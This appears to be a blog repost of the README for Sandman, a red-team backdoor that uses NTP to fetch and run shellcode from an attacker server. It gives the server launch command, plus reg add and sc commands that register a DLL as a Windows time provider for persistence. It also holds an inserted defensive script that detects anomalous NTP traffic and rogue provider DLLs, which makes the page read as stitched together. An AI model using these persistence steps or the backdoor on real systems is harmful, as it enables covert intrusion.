Friday, October 28, 2022

NTP Based Backdoor For Red Team Engagements In Hardened Networks




Sandman is a backdoor that is meant to work on hardened networks during red team engagements.

Sandman works as a stager and leverages NTP (a protocol to sync time & date) to get and run an arbitrary shellcode from a pre-defined server.

NTP is a protocol that is overlooked by many defenders, which results in wide network accessibility.

Usage

SandmanServer (Usage)

Run on a Windows / *nix machine:

python3 sandman_server.py "Network Adapter" "Payload Url" "optional: ip to spoof"

SandmanBackdoor (Usage)

To start, you can compile the SandmanBackdoor as mentioned below; because it is a single lightweight C# executable you can execute it via ExecuteAssembly, run it as an NTP provider or just execute/inject it.

SandmanBackdoorTimeProvider (Usage)

To use it, you will need to follow these simple steps:

  • Add the following registry value:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient" /v DllName /t REG_SZ /d "C:\Path\To\The\Dll.dll"
  • Restart the w32time service:
sc stop w32time
sc start w32time

NOTE: Make sure you are compiling with the x64 option and not the Any CPU option!

Capabilities

  • Getting and executing an arbitrary payload from an attacker-controlled server.

  • Can work on hardened networks since NTP is usually allowed in the firewall.

  • Impersonating a legitimate NTP server via IP spoofing.
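The two footholds described above (a time-provider DLL registered under W32Time, and an NTP exchange that carries more than a time sync) are what a defender would monitor for. The following is an added example written for this page, not code from Sandman or its author: it parses the fixed 48-byte NTP header to flag unexpected versions, modes and trailing data, and checks W32Time provider DllName values against a stock-DLL allowlist. All packets and registry values are constructed samples; the allowlist contents (w32time.dll, vmictimeprovider.dll) and the set of "legitimate" trailer lengths are assumptions about stock Windows and classic MAC-authenticated NTP.

```python
"""Defender-side checks for the two footholds described on this page: an NTP
request/response that carries more than a time sync, and a W32Time time
provider whose DllName points somewhere other than the stock DLL.
This is an added example, not code from Sandman or its author."""

NTP_HEADER_LEN = 48          # RFC 5905 fixed header size in bytes
# Legitimate data after the header: nothing, a 20-byte MD5 MAC (4-byte key id
# + 16-byte digest) or a 24-byte SHA-1 MAC (4-byte key id + 20-byte digest).
# Assumption: NTS / extension fields are not in use on the monitored segment.
LEGIT_TRAILER_LENS = {0, 20, 24}
# Modes a workstation should send/receive: 1/2 symmetric, 3 = client,
# 4 = server, 5 = broadcast. 6/7 are control/private queries, 0 is reserved.
EXPECTED_MODES = {1, 2, 3, 4, 5}


def inspect_ntp_packet(payload: bytes) -> list:
    """Return a list of human-readable anomalies for one UDP/123 payload.
    An empty list means the packet looks like plain NTPv3/v4."""
    findings = []
    if len(payload) < NTP_HEADER_LEN:
        return ["short packet: %d bytes" % len(payload)]
    first = payload[0]                 # LI (2 bits) | VN (3 bits) | mode (3 bits)
    version = (first >> 3) & 0x7
    mode = first & 0x7
    if version not in (3, 4):
        findings.append("unexpected version %d" % version)
    if mode not in EXPECTED_MODES:
        findings.append("unexpected mode %d" % mode)
    trailer = len(payload) - NTP_HEADER_LEN
    if trailer not in LEGIT_TRAILER_LENS:
        findings.append("unexpected trailer of %d bytes after header" % trailer)
    return findings


def scan_ntp_flows(packets: list) -> dict:
    """packets: list of (src, dst, payload). Returns {src: [anomalies...]}
    for every source that sent at least one anomalous packet."""
    report = {}
    for src, _dst, payload in packets:
        anomalies = inspect_ntp_packet(payload)
        if anomalies:
            report.setdefault(src, []).extend(anomalies)
    return report


# Stock provider DLLs shipped with Windows (assumption: w32time.dll for
# NtpClient/NtpServer, vmictimeprovider.dll on Hyper-V guests).
KNOWN_PROVIDER_DLLS = {"w32time.dll", "vmictimeprovider.dll"}


def check_time_providers(providers: dict, allowed=KNOWN_PROVIDER_DLLS) -> list:
    """providers maps provider name -> DllName value as read from
    HKLM\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\<name>.
    Returns the provider names whose DLL file name is not in the allowlist."""
    flagged = []
    for name, dll in providers.items():
        base = dll.replace("/", "\\").rsplit("\\", 1)[-1].strip().lower()
        if base not in allowed:
            flagged.append(name)
    return flagged


# --- constructed samples (not real captures or real registry data) ---
CLIENT_REQUEST = bytes([0x23]) + bytes(47)                 # LI=0, VN=4, mode=3
SERVER_REPLY_MAC = bytes([0x24]) + bytes(47) + bytes(20)   # mode 4 + MD5 MAC
OVERSIZED = bytes([0x24]) + bytes(47) + b"A" * 300         # mode 4 + 300-byte blob
PRIVATE_QUERY = bytes([0x27]) + bytes(47)                  # mode 7 from a workstation

SAMPLE_FLOWS = [
    ("10.0.0.5", "10.0.0.1", CLIENT_REQUEST),
    ("10.0.0.1", "10.0.0.5", SERVER_REPLY_MAC),
    ("203.0.113.9", "10.0.0.5", OVERSIZED),
    ("10.0.0.7", "10.0.0.1", PRIVATE_QUERY),
]

SAMPLE_PROVIDERS = {
    "NtpClient": r"C:\Path\To\The\Dll.dll",            # non-stock DLL (constructed)
    "NtpServer": r"%systemroot%\system32\w32time.dll",  # stock value
}

if __name__ == "__main__":
    for src, issues in scan_ntp_flows(SAMPLE_FLOWS).items():
        print(src, "->", "; ".join(issues))
    print("non-stock time providers:", check_time_providers(SAMPLE_PROVIDERS))
```

The trailer-length rule is a heuristic: NTPv4 extension fields and NTS (RFC 8915) legitimately produce packets longer than 48 bytes, so on segments that use them the allowed lengths must be widened or the check replaced with per-host baselining. The provider check is deliberately OS-independent so it can run over values exported from an endpoint inventory; on a live host the same values come from the TimeProviders subkeys named in the steps above.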

Setup

SandmanServer (Setup)

SandmanBackdoor (Setup)

To compile the backdoor I used Visual Studio 2022, but as mentioned in the usage section it can be compiled with both VS2022 and CSC. You can compile it either with USE_SHELLCODE defined, to use Orca's shellcode, or without USE_SHELLCODE, to use WebClient.

SandmanBackdoorTimeProvider (Setup)

To compile the backdoor I used Visual Studio 2022; you will also need to install DllExport (via NuGet or any other way) to compile it. You can compile it either with USE_SHELLCODE defined, to use Orca's shellcode, or without USE_SHELLCODE, to use WebClient.

IOCs

Contributions

Thanks to those who already contributed. I will happily accept contributions: make a pull request and I will review it!
